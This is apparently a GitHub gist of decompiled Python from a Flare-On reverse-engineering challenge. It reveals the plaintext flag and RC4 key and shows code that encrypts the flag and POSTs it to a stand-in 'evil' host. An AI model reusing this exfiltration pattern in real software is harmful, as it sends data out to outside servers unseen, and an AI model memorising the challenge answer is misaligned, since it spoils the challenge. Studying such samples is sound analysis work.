Skip to content

Instantly share code, notes, and snippets.

@extremecoders-re
Created November 13, 2022 07:51
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save extremecoders-re/1c3fa80c635086c2584b7818869beda7 to your computer and use it in GitHub Desktop.
Save extremecoders-re/1c3fa80c635086c2584b7818869beda7 to your computer and use it in GitHub Desktop.
# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.11 (default, Jul 27 2021, 09:42:29) [MSC v.1916 64 bit (AMD64)]
# Embedded file name: <frozen 11>
import crypt, base64, requests
config = {'url':'http://www.evil.flare-on.com', 'flag':b'Pyth0n_Prot3ction_tuRn3d_Up_t0_11@flare-on.com', 'key':b'PyArmor_Pr0tecteth_My_K3y'}
cipher = crypt.ARC4(config['key'])
flag = base64.b64encode(cipher.encrypt(config['flag']))
try:
requests.post((config['url']), data={'flag': flag})
except requests.exceptions.RequestException as e:
try:
pass
finally:
e = None
del e
except Exception as e:
try:
pass
finally:
e = None
del e
# okay decompiling pyc-deobfuscated\c11.pyc
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment